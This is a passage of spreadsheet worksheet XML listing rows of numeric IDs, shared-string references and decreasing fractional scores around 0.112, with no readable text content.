        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="26607" ht="15.75" customHeight="1">
      <c r="A26607" s="1">
        <v>12615.0</v>
      </c>
      <c r="B26607" s="2">
        <v>3.0199881E7</v>
      </c>
      <c r="C26607" s="2" t="s">
        <v>25580</v>
      </c>
      <c r="D26607" s="2">
        <v>1.0</v>
      </c>
      <c r="E26607" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26607" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="26608" ht="15.75" customHeight="1">
      <c r="A26608" s="1">
        <v>20611.0</v>
      </c>
      <c r="B26608" s="2">
        <v>1.3966234E7</v>
      </c>
      <c r="C26608" s="2" t="s">
        <v>25581</v>
      </c>
      <c r="D26608" s="2">
        <v>1.0</v>
      </c>
      <c r="E26608" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26608" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="26609" ht="15.75" customHeight="1">
      <c r="A26609" s="1">
        <v>5310.0</v>
      </c>
      <c r="B26609" s="2">
        <v>4.5270743E7</v>
      </c>
      <c r="C26609" s="2" t="s">
        <v>25582</v>
      </c>
      <c r="D26609" s="2">
        <v>1.0</v>
      </c>
      <c r="E26609" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26609" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="26610" ht="15.75" customHeight="1">
      <c r="A26610" s="1">
        <v>21683.0</v>
      </c>
      <c r="B26610" s="2">
        <v>2.5076061E7</v>
      </c>
      <c r="C26610" s="2" t="s">
        <v>25281</v>
      </c>
      <c r="D26610" s="2">
        <v>1.0</v>
      </c>
      <c r="E26610" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26610" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="26611" ht="15.75" customHeight="1">
      <c r="A26611" s="1">
        <v>26162.0</v>
      </c>
      <c r="B26611" s="2">
        <v>1.6097611E7</v>
      </c>
      <c r="C26611" s="2" t="s">
        <v>25583</v>
      </c>
      <c r="D26611" s="2">
        <v>1.0</v>
      </c>
      <c r="E26611" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26611" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="26612" ht="15.75" customHeight="1">
      <c r="A26612" s="1">
        <v>30206.0</v>
      </c>
      <c r="B26612" s="2">
        <v>3.7349584E7</v>
      </c>
      <c r="C26612" s="2" t="s">
        <v>25584</v>
      </c>
      <c r="D26612" s="2">
        <v>1.0</v>
      </c>
      <c r="E26612" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26612" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="26613" ht="15.75" customHeight="1">
      <c r="A26613" s="1">
        <v>31222.0</v>
      </c>
      <c r="B26613" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C26613" s="2" t="s">
        <v>25585</v>
      </c>
      <c r="D26613" s="2">
        <v>1.0</v>
      </c>
      <c r="E26613" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26613" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="26614" ht="15.75" customHeight="1">
      <c r="A26614" s="1">
        <v>11661.0</v>
      </c>
      <c r="B26614" s="2">
        <v>2.3343054E7</v>
      </c>
      <c r="C26614" s="2" t="s">
        <v>25586</v>
      </c>
      <c r="D26614" s="2">
        <v>1.0</v>
      </c>
      <c r="E26614" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26614" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="26615" ht="15.75" customHeight="1">
      <c r="A26615" s="1">
        <v>34214.0</v>
      </c>
      <c r="B26615" s="2">
        <v>2.95284E7</v>
      </c>
      <c r="C26615" s="2" t="s">
        <v>25587</v>
      </c>
      <c r="D26615" s="2">
        <v>1.0</v>
      </c>
      <c r="E26615" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26615" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="26616" ht="15.75" customHeight="1">
      <c r="A26616" s="1">
        <v>16616.0</v>
      </c>
      <c r="B26616" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C26616" s="2" t="s">
        <v>25588</v>
      </c>
      <c r="D26616" s="2">
        <v>1.0</v>
      </c>
      <c r="E26616" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26616" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="26617" ht="15.75" customHeight="1">
      <c r="A26617" s="1">
        <v>28619.0</v>
      </c>
      <c r="B26617" s="2">
        <v>2.7165628E7</v>
      </c>
      <c r="C26617" s="2" t="s">
        <v>25589</v>
      </c>
      <c r="D26617" s="2">
        <v>1.0</v>
      </c>
      <c r="E26617" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26617" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="26618" ht="15.75" customHeight="1">
      <c r="A26618" s="1">
        <v>32074.0</v>
      </c>
      <c r="B26618" s="2">
        <v>5.3816511E7</v>
      </c>
      <c r="C26618" s="2" t="s">
        <v>25590</v>
      </c>
      <c r="D26618" s="2">
        <v>1.0</v>
      </c>
      <c r="E26618" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26618" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="26619" ht="15.75" customHeight="1">
      <c r="A26619" s="1">
        <v>15808.0</v>
      </c>
      <c r="B26619" s="2">
        <v>4.4243516E7</v>
      </c>
      <c r="C26619" s="2" t="s">
        <v>25591</v>
      </c>
      <c r="D26619" s="2">
        <v>1.0</v>
      </c>
      <c r="E26619" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26619" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="26620" ht="15.75" customHeight="1">
      <c r="A26620" s="1">
        <v>21846.0</v>
      </c>
      <c r="B26620" s="2">
        <v>2.7165629E7</v>
      </c>
      <c r="C26620" s="2" t="s">
        <v>25592</v>
      </c>
      <c r="D26620" s="2">
        <v>1.0</v>
      </c>
      <c r="E26620" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26620" s="2">
        <v>0.1136752136752137</v>
      </c>
    </row>
    <row r="26621" ht="15.75" customHeight="1">
      <c r="A26621" s="1">
        <v>29958.0</v>
      </c>
      <c r="B26621" s="2">
        <v>3607687.0</v>
      </c>
      <c r="C26621" s="2" t="s">
        <v>25593</v>
      </c>
      <c r="D26621" s="2">
        <v>1.0</v>
      </c>
      <c r="E26621" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26621" s="2">
        <v>0.1136363636363636</v>
      </c>
    </row>
    <row r="26622" ht="15.75" customHeight="1">
      <c r="A26622" s="1">
        <v>12194.0</v>
      </c>
      <c r="B26622" s="2">
        <v>2.7482052E7</v>
      </c>
      <c r="C26622" s="2" t="s">
        <v>25594</v>
      </c>
      <c r="D26622" s="2">
        <v>1.0</v>
      </c>
      <c r="E26622" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26622" s="2">
        <v>0.113425925925926</v>
      </c>
    </row>
    <row r="26623" ht="15.75" customHeight="1">
      <c r="A26623" s="1">
        <v>12217.0</v>
      </c>
      <c r="B26623" s="2">
        <v>2.7716797E7</v>
      </c>
      <c r="C26623" s="2" t="s">
        <v>25595</v>
      </c>
      <c r="D26623" s="2">
        <v>1.0</v>
      </c>
      <c r="E26623" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26623" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="26624" ht="15.75" customHeight="1">
      <c r="A26624" s="1">
        <v>19737.0</v>
      </c>
      <c r="B26624" s="2">
        <v>5.6677784E7</v>
      </c>
      <c r="C26624" s="2" t="s">
        <v>25596</v>
      </c>
      <c r="D26624" s="2">
        <v>1.0</v>
      </c>
      <c r="E26624" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26624" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="26625" ht="15.75" customHeight="1">
      <c r="A26625" s="1">
        <v>25890.0</v>
      </c>
      <c r="B26625" s="2">
        <v>1.498375E7</v>
      </c>
      <c r="C26625" s="2" t="s">
        <v>25597</v>
      </c>
      <c r="D26625" s="2">
        <v>1.0</v>
      </c>
      <c r="E26625" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26625" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="26626" ht="15.75" customHeight="1">
      <c r="A26626" s="1">
        <v>28545.0</v>
      </c>
      <c r="B26626" s="2">
        <v>2.6858152E7</v>
      </c>
      <c r="C26626" s="2" t="s">
        <v>25598</v>
      </c>
      <c r="D26626" s="2">
        <v>1.0</v>
      </c>
      <c r="E26626" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26626" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="26627" ht="15.75" customHeight="1">
      <c r="A26627" s="1">
        <v>32830.0</v>
      </c>
      <c r="B26627" s="2">
        <v>6238337.0</v>
      </c>
      <c r="C26627" s="2" t="s">
        <v>25599</v>
      </c>
      <c r="D26627" s="2">
        <v>1.0</v>
      </c>
      <c r="E26627" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26627" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="26628" ht="15.75" customHeight="1">
      <c r="A26628" s="1">
        <v>113.0</v>
      </c>
      <c r="B26628" s="2">
        <v>1.2958827E7</v>
      </c>
      <c r="C26628" s="2" t="s">
        <v>25600</v>
      </c>
      <c r="D26628" s="2">
        <v>1.0</v>
      </c>
      <c r="E26628" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26628" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26629" ht="15.75" customHeight="1">
      <c r="A26629" s="1">
        <v>1517.0</v>
      </c>
      <c r="B26629" s="2">
        <v>2.735299E7</v>
      </c>
      <c r="C26629" s="2" t="s">
        <v>25601</v>
      </c>
      <c r="D26629" s="2">
        <v>1.0</v>
      </c>
      <c r="E26629" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26629" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26630" ht="15.75" customHeight="1">
      <c r="A26630" s="1">
        <v>5999.0</v>
      </c>
      <c r="B26630" s="2">
        <v>4.7459817E7</v>
      </c>
      <c r="C26630" s="2" t="s">
        <v>25602</v>
      </c>
      <c r="D26630" s="2">
        <v>1.0</v>
      </c>
      <c r="E26630" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26630" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26631" ht="15.75" customHeight="1">
      <c r="A26631" s="1">
        <v>10666.0</v>
      </c>
      <c r="B26631" s="2">
        <v>1.4368406E7</v>
      </c>
      <c r="C26631" s="2" t="s">
        <v>25603</v>
      </c>
      <c r="D26631" s="2">
        <v>1.0</v>
      </c>
      <c r="E26631" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26631" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26632" ht="15.75" customHeight="1">
      <c r="A26632" s="1">
        <v>11362.0</v>
      </c>
      <c r="B26632" s="2">
        <v>2.1348651E7</v>
      </c>
      <c r="C26632" s="2" t="s">
        <v>25604</v>
      </c>
      <c r="D26632" s="2">
        <v>1.0</v>
      </c>
      <c r="E26632" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26632" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26633" ht="15.75" customHeight="1">
      <c r="A26633" s="1">
        <v>12233.0</v>
      </c>
      <c r="B26633" s="2">
        <v>2.7865678E7</v>
      </c>
      <c r="C26633" s="2" t="s">
        <v>25605</v>
      </c>
      <c r="D26633" s="2">
        <v>1.0</v>
      </c>
      <c r="E26633" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26633" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26634" ht="15.75" customHeight="1">
      <c r="A26634" s="1">
        <v>13238.0</v>
      </c>
      <c r="B26634" s="2">
        <v>3.4256158E7</v>
      </c>
      <c r="C26634" s="2" t="s">
        <v>25606</v>
      </c>
      <c r="D26634" s="2">
        <v>1.0</v>
      </c>
      <c r="E26634" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26634" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26635" ht="15.75" customHeight="1">
      <c r="A26635" s="1">
        <v>14516.0</v>
      </c>
      <c r="B26635" s="2">
        <v>3.9748333E7</v>
      </c>
      <c r="C26635" s="2" t="s">
        <v>25607</v>
      </c>
      <c r="D26635" s="2">
        <v>1.0</v>
      </c>
      <c r="E26635" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26635" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26636" ht="15.75" customHeight="1">
      <c r="A26636" s="1">
        <v>16415.0</v>
      </c>
      <c r="B26636" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C26636" s="2" t="s">
        <v>25608</v>
      </c>
      <c r="D26636" s="2">
        <v>1.0</v>
      </c>
      <c r="E26636" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26636" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26637" ht="15.75" customHeight="1">
      <c r="A26637" s="1">
        <v>22930.0</v>
      </c>
      <c r="B26637" s="2">
        <v>4.861917E7</v>
      </c>
      <c r="C26637" s="2" t="s">
        <v>25609</v>
      </c>
      <c r="D26637" s="2">
        <v>1.0</v>
      </c>
      <c r="E26637" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26637" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26638" ht="15.75" customHeight="1">
      <c r="A26638" s="1">
        <v>25054.0</v>
      </c>
      <c r="B26638" s="2">
        <v>1.2867375E7</v>
      </c>
      <c r="C26638" s="2" t="s">
        <v>25610</v>
      </c>
      <c r="D26638" s="2">
        <v>1.0</v>
      </c>
      <c r="E26638" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26638" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26639" ht="15.75" customHeight="1">
      <c r="A26639" s="1">
        <v>29357.0</v>
      </c>
      <c r="B26639" s="2">
        <v>3.1649546E7</v>
      </c>
      <c r="C26639" s="2" t="s">
        <v>25611</v>
      </c>
      <c r="D26639" s="2">
        <v>1.0</v>
      </c>
      <c r="E26639" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26639" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="26640" ht="15.75" customHeight="1">
      <c r="A26640" s="1">
        <v>3908.0</v>
      </c>
      <c r="B26640" s="2">
        <v>4.0489508E7</v>
      </c>
      <c r="C26640" s="2" t="s">
        <v>25612</v>
      </c>
      <c r="D26640" s="2">
        <v>1.0</v>
      </c>
      <c r="E26640" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26640" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26641" ht="15.75" customHeight="1">
      <c r="A26641" s="1">
        <v>4728.0</v>
      </c>
      <c r="B26641" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C26641" s="2" t="s">
        <v>25613</v>
      </c>
      <c r="D26641" s="2">
        <v>1.0</v>
      </c>
      <c r="E26641" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26641" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26642" ht="15.75" customHeight="1">
      <c r="A26642" s="1">
        <v>5298.0</v>
      </c>
      <c r="B26642" s="2">
        <v>4.5221941E7</v>
      </c>
      <c r="C26642" s="2" t="s">
        <v>25614</v>
      </c>
      <c r="D26642" s="2">
        <v>1.0</v>
      </c>
      <c r="E26642" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26642" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26643" ht="15.75" customHeight="1">
      <c r="A26643" s="1">
        <v>6337.0</v>
      </c>
      <c r="B26643" s="2">
        <v>4.8296413E7</v>
      </c>
      <c r="C26643" s="2" t="s">
        <v>25615</v>
      </c>
      <c r="D26643" s="2">
        <v>1.0</v>
      </c>
      <c r="E26643" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26643" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26644" ht="15.75" customHeight="1">
      <c r="A26644" s="1">
        <v>8365.0</v>
      </c>
      <c r="B26644" s="2">
        <v>5.37911E7</v>
      </c>
      <c r="C26644" s="2" t="s">
        <v>25616</v>
      </c>
      <c r="D26644" s="2">
        <v>1.0</v>
      </c>
      <c r="E26644" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26644" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26645" ht="15.75" customHeight="1">
      <c r="A26645" s="1">
        <v>8545.0</v>
      </c>
      <c r="B26645" s="2">
        <v>5.4138753E7</v>
      </c>
      <c r="C26645" s="2" t="s">
        <v>25617</v>
      </c>
      <c r="D26645" s="2">
        <v>1.0</v>
      </c>
      <c r="E26645" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26645" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26646" ht="15.75" customHeight="1">
      <c r="A26646" s="1">
        <v>10541.0</v>
      </c>
      <c r="B26646" s="2">
        <v>1.2411299E7</v>
      </c>
      <c r="C26646" s="2" t="s">
        <v>25618</v>
      </c>
      <c r="D26646" s="2">
        <v>1.0</v>
      </c>
      <c r="E26646" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26646" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26647" ht="15.75" customHeight="1">
      <c r="A26647" s="1">
        <v>11045.0</v>
      </c>
      <c r="B26647" s="2">
        <v>1.8123603E7</v>
      </c>
      <c r="C26647" s="2" t="s">
        <v>25619</v>
      </c>
      <c r="D26647" s="2">
        <v>1.0</v>
      </c>
      <c r="E26647" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26647" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26648" ht="15.75" customHeight="1">
      <c r="A26648" s="1">
        <v>12126.0</v>
      </c>
      <c r="B26648" s="2">
        <v>2.6938194E7</v>
      </c>
      <c r="C26648" s="2" t="s">
        <v>25620</v>
      </c>
      <c r="D26648" s="2">
        <v>1.0</v>
      </c>
      <c r="E26648" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26648" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26649" ht="15.75" customHeight="1">
      <c r="A26649" s="1">
        <v>13297.0</v>
      </c>
      <c r="B26649" s="2">
        <v>3.4483441E7</v>
      </c>
      <c r="C26649" s="2" t="s">
        <v>25621</v>
      </c>
      <c r="D26649" s="2">
        <v>1.0</v>
      </c>
      <c r="E26649" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26649" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26650" ht="15.75" customHeight="1">
      <c r="A26650" s="1">
        <v>14514.0</v>
      </c>
      <c r="B26650" s="2">
        <v>3.9748333E7</v>
      </c>
      <c r="C26650" s="2" t="s">
        <v>25622</v>
      </c>
      <c r="D26650" s="2">
        <v>1.0</v>
      </c>
      <c r="E26650" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26650" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26651" ht="15.75" customHeight="1">
      <c r="A26651" s="1">
        <v>16247.0</v>
      </c>
      <c r="B26651" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C26651" s="2" t="s">
        <v>25623</v>
      </c>
      <c r="D26651" s="2">
        <v>1.0</v>
      </c>
      <c r="E26651" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26651" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26652" ht="15.75" customHeight="1">
      <c r="A26652" s="1">
        <v>16904.0</v>
      </c>
      <c r="B26652" s="2">
        <v>4.8110695E7</v>
      </c>
      <c r="C26652" s="2" t="s">
        <v>25624</v>
      </c>
      <c r="D26652" s="2">
        <v>1.0</v>
      </c>
      <c r="E26652" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26652" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26653" ht="15.75" customHeight="1">
      <c r="A26653" s="1">
        <v>18927.0</v>
      </c>
      <c r="B26653" s="2">
        <v>5.4244049E7</v>
      </c>
      <c r="C26653" s="2" t="s">
        <v>25625</v>
      </c>
      <c r="D26653" s="2">
        <v>1.0</v>
      </c>
      <c r="E26653" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26653" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26654" ht="15.75" customHeight="1">
      <c r="A26654" s="1">
        <v>19445.0</v>
      </c>
      <c r="B26654" s="2">
        <v>5.5717081E7</v>
      </c>
      <c r="C26654" s="2" t="s">
        <v>25626</v>
      </c>
      <c r="D26654" s="2">
        <v>1.0</v>
      </c>
      <c r="E26654" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26654" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26655" ht="15.75" customHeight="1">
      <c r="A26655" s="1">
        <v>19485.0</v>
      </c>
      <c r="B26655" s="2">
        <v>5.5857934E7</v>
      </c>
      <c r="C26655" s="2" t="s">
        <v>25627</v>
      </c>
      <c r="D26655" s="2">
        <v>1.0</v>
      </c>
      <c r="E26655" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26655" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26656" ht="15.75" customHeight="1">
      <c r="A26656" s="1">
        <v>19936.0</v>
      </c>
      <c r="B26656" s="2">
        <v>5.7445996E7</v>
      </c>
      <c r="C26656" s="2" t="s">
        <v>25628</v>
      </c>
      <c r="D26656" s="2">
        <v>1.0</v>
      </c>
      <c r="E26656" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26656" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26657" ht="15.75" customHeight="1">
      <c r="A26657" s="1">
        <v>20880.0</v>
      </c>
      <c r="B26657" s="2">
        <v>1.6047716E7</v>
      </c>
      <c r="C26657" s="2" t="s">
        <v>25629</v>
      </c>
      <c r="D26657" s="2">
        <v>1.0</v>
      </c>
      <c r="E26657" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26657" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26658" ht="15.75" customHeight="1">
      <c r="A26658" s="1">
        <v>26178.0</v>
      </c>
      <c r="B26658" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C26658" s="2" t="s">
        <v>25630</v>
      </c>
      <c r="D26658" s="2">
        <v>1.0</v>
      </c>
      <c r="E26658" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26658" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26659" ht="15.75" customHeight="1">
      <c r="A26659" s="1">
        <v>28518.0</v>
      </c>
      <c r="B26659" s="2">
        <v>2.6756364E7</v>
      </c>
      <c r="C26659" s="2" t="s">
        <v>25631</v>
      </c>
      <c r="D26659" s="2">
        <v>1.0</v>
      </c>
      <c r="E26659" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26659" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26660" ht="15.75" customHeight="1">
      <c r="A26660" s="1">
        <v>30073.0</v>
      </c>
      <c r="B26660" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C26660" s="2" t="s">
        <v>25632</v>
      </c>
      <c r="D26660" s="2">
        <v>1.0</v>
      </c>
      <c r="E26660" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26660" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26661" ht="15.75" customHeight="1">
      <c r="A26661" s="1">
        <v>31212.0</v>
      </c>
      <c r="B26661" s="2">
        <v>4924828.0</v>
      </c>
      <c r="C26661" s="2" t="s">
        <v>25633</v>
      </c>
      <c r="D26661" s="2">
        <v>1.0</v>
      </c>
      <c r="E26661" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26661" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26662" ht="15.75" customHeight="1">
      <c r="A26662" s="1">
        <v>31425.0</v>
      </c>
      <c r="B26662" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C26662" s="2" t="s">
        <v>25634</v>
      </c>
      <c r="D26662" s="2">
        <v>1.0</v>
      </c>
      <c r="E26662" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26662" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="26663" ht="15.75" customHeight="1">
      <c r="A26663" s="1">
        <v>106.0</v>
      </c>
      <c r="B26663" s="2">
        <v>1.2894029E7</v>
      </c>
      <c r="C26663" s="2" t="s">
        <v>25635</v>
      </c>
      <c r="D26663" s="2">
        <v>1.0</v>
      </c>
      <c r="E26663" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26663" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26664" ht="15.75" customHeight="1">
      <c r="A26664" s="1">
        <v>295.0</v>
      </c>
      <c r="B26664" s="2">
        <v>1.5501785E7</v>
      </c>
      <c r="C26664" s="2" t="s">
        <v>25636</v>
      </c>
      <c r="D26664" s="2">
        <v>1.0</v>
      </c>
      <c r="E26664" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26664" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26665" ht="15.75" customHeight="1">
      <c r="A26665" s="1">
        <v>541.0</v>
      </c>
      <c r="B26665" s="2">
        <v>1.8697873E7</v>
      </c>
      <c r="C26665" s="2" t="s">
        <v>25637</v>
      </c>
      <c r="D26665" s="2">
        <v>1.0</v>
      </c>
      <c r="E26665" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26665" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26666" ht="15.75" customHeight="1">
      <c r="A26666" s="1">
        <v>779.0</v>
      </c>
      <c r="B26666" s="2">
        <v>2.1120151E7</v>
      </c>
      <c r="C26666" s="2" t="s">
        <v>25638</v>
      </c>
      <c r="D26666" s="2">
        <v>1.0</v>
      </c>
      <c r="E26666" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26666" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26667" ht="15.75" customHeight="1">
      <c r="A26667" s="1">
        <v>1159.0</v>
      </c>
      <c r="B26667" s="2">
        <v>2.4478583E7</v>
      </c>
      <c r="C26667" s="2" t="s">
        <v>25639</v>
      </c>
      <c r="D26667" s="2">
        <v>1.0</v>
      </c>
      <c r="E26667" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26667" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26668" ht="15.75" customHeight="1">
      <c r="A26668" s="1">
        <v>2334.0</v>
      </c>
      <c r="B26668" s="2">
        <v>3.2960854E7</v>
      </c>
      <c r="C26668" s="2" t="s">
        <v>25640</v>
      </c>
      <c r="D26668" s="2">
        <v>1.0</v>
      </c>
      <c r="E26668" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26668" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26669" ht="15.75" customHeight="1">
      <c r="A26669" s="1">
        <v>2387.0</v>
      </c>
      <c r="B26669" s="2">
        <v>3.3343273E7</v>
      </c>
      <c r="C26669" s="2" t="s">
        <v>25641</v>
      </c>
      <c r="D26669" s="2">
        <v>1.0</v>
      </c>
      <c r="E26669" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26669" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26670" ht="15.75" customHeight="1">
      <c r="A26670" s="1">
        <v>2867.0</v>
      </c>
      <c r="B26670" s="2">
        <v>3.5567566E7</v>
      </c>
      <c r="C26670" s="2" t="s">
        <v>25642</v>
      </c>
      <c r="D26670" s="2">
        <v>1.0</v>
      </c>
      <c r="E26670" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26670" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26671" ht="15.75" customHeight="1">
      <c r="A26671" s="1">
        <v>2894.0</v>
      </c>
      <c r="B26671" s="2">
        <v>3.5727611E7</v>
      </c>
      <c r="C26671" s="2" t="s">
        <v>25643</v>
      </c>
      <c r="D26671" s="2">
        <v>1.0</v>
      </c>
      <c r="E26671" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26671" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26672" ht="15.75" customHeight="1">
      <c r="A26672" s="1">
        <v>2968.0</v>
      </c>
      <c r="B26672" s="2">
        <v>3.608198E7</v>
      </c>
      <c r="C26672" s="2" t="s">
        <v>25644</v>
      </c>
      <c r="D26672" s="2">
        <v>1.0</v>
      </c>
      <c r="E26672" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26672" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="26673" ht="15.75" customHeight="1">
      <c r="A26673" s="1">
        <v>3272.0</v>
      </c>
      <c r="B26673" s="2">
        <v>3.7473625E7</v>
      </c>
      <c r="C26673" s="2" t="s">
        <v>25645</v>
      </c>
      <c r="D26673" s="2">
        <v>1.0</v>
      </c>
      <c r="E26673" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26673" s="2">
